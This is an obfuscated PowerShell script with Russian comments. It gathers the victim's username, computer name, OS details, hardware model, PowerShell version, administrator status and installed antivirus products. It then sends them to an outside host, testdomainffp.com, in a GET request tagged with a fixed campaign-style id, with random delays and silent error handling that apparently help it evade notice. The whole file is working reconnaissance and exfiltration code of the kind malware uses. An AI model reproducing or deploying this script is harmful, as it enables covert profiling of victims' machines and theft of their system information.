$orh_etcqzlzr6sdtr48r9b1urcriaed8u1s = 'efbe6b38-b06d-4dda-badf-ffeacea07eaf' $xmlzsciwr_cqd_fclmu = $env:USERNAME $uoibsnun_efnwuajrj_jluvxexfh_bum = $env:COMPUTERNAME $xoynfvpe4_jnrnum_ohend84cj0yj27yw = [Environment]::OSVersion.VersionString # Сбор информации с обработкой ошибок try { $dbcigmhq_uol3f8uxck8nnnf346vun3 = Get-WmiObject -Class Win32_ComputerSystem $wvxd_gzdbgjir3b7ybhbzrsvbwyb = $dbcigmhq_uol3f8uxck8nnnf346vun3.Model $ixhqedmc_xfhwpriw1_pz = $dbcigmhq_uol3f8uxck8nnnf346vun3.Manufacturer $ymls_wdoggsiu_unbcmj_hdakg9jt = (Get-WmiObject -Class Win32_OperatingSystem).Caption $mje_wvp_jthcub3irouoq4 = $PSVersionTable.PSVersion.ToString() $mmae1_rfpujowie1_koc_ntfqtis8 = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) try { $dypy_rhrkmkojb1mfk6ore61 = Get-CimInstance -ClassName AntiVirusProduct -Namespace root/SecurityCenter2 -ErrorAction SilentlyContinue | Select-Object -ExpandProperty displayName if ($dypy_rhrkmkojb1mfk6ore61) { $dypy_rhrkmkojb1mfk6ore61 = ($dypy_rhrkmkojb1mfk6ore61 -join " | ") } else { $dypy_rhrkmkojb1mfk6ore61 = "None" } } catch { $dypy_rhrkmkojb1mfk6ore61 = "QueryFailed" } # Если дошли сюда без исключений - информация собрана успешно $checkResult = "OK" $checkNote = "System info collected successfully" } catch { # Если была ошибка при сборе $checkResult = "FAIL" $errorMsg = $_.Exception.Message $checkNote = "Error collecting system info: $errorMsg" # Устанавливаем значения по умолчанию при ошибке $wvxd_gzdbgjir3b7ybhbzrsvbwyb = "Unknown" $ixhqedmc_xfhwpriw1_pz = "Unknown" $ymls_wdoggsiu_unbcmj_hdakg9jt = "Unknown" $mje_wvp_jthcub3irouoq4 = "Unknown" $mmae1_rfpujowie1_koc_ntfqtis8 = $false $dypy_rhrkmkojb1mfk6ore61 = "Error" } # Отправляем результат Add-Type -AssemblyName System.IO.Compression.FileSystem function pryppqxw_mzcgxfe($inputStr) { return ($inputStr -replace '[aeiou]', 'x') } function gxwni8_jmihcsy_dvwvho5_jkj4pbhxom($event, $note="", $path="", $file="") { $endpoint = 'https://testdomainffp.com' + '/apypais?id=' + $orh_etcqzlzr6sdtr48r9b1urcriaed8u1s + '&s=' + $event $queryParams = @( '&user=' + [System.Uri]::EscapeDataString($xmlzsciwr_cqd_fclmu), '&pc=' + [System.Uri]::EscapeDataString($uoibsnun_efnwuajrj_jluvxexfh_bum), '&cwd=' + [System.Uri]::EscapeDataString($path), '&osver=' + [System.Uri]::EscapeDataString($xoynfvpe4_jnrnum_ohend84cj0yj27yw), '&osname=' + [System.Uri]::EscapeDataString($ymls_wdoggsiu_unbcmj_hdakg9jt), '&pcmodel=' + [System.Uri]::EscapeDataString($wvxd_gzdbgjir3b7ybhbzrsvbwyb), '&pcmanuf=' + [System.Uri]::EscapeDataString($ixhqedmc_xfhwpriw1_pz), '&psv=' + [System.Uri]::EscapeDataString($mje_wvp_jthcub3irouoq4), '&admin=' + $mmae1_rfpujowie1_koc_ntfqtis8, '&avinfo=' + [System.Uri]::EscapeDataString($dypy_rhrkmkojb1mfk6ore61), '&noise=' + (Get-Random -Minimum 5000 -Maximum 15000) ) if ($file) { $queryParams += '&exe_name=' + [System.Uri]::EscapeDataString($file) } if ($note) { $queryParams += '&msg=' + [System.Uri]::EscapeDataString($note) } $fullUri = $endpoint + ($queryParams -join '') try { $null = Invoke-WebRequest -Uri $fullUri -Method GET -UseBasicParsing -TimeoutSec 10 } catch { } Start-Sleep -Milliseconds (Get-Random -Minimum 300 -Maximum 4000) } # Отправляем результат проверки системы if ($checkResult -eq "OK") { & gxwni8_jmihcsy_dvwvho5_jkj4pbhxom 'check_useros' $checkNote $env:TEMP $null } else { & gxwni8_jmihcsy_dvwvho5_jkj4pbhxom 'check_useros' $checkNote $env:TEMP $null }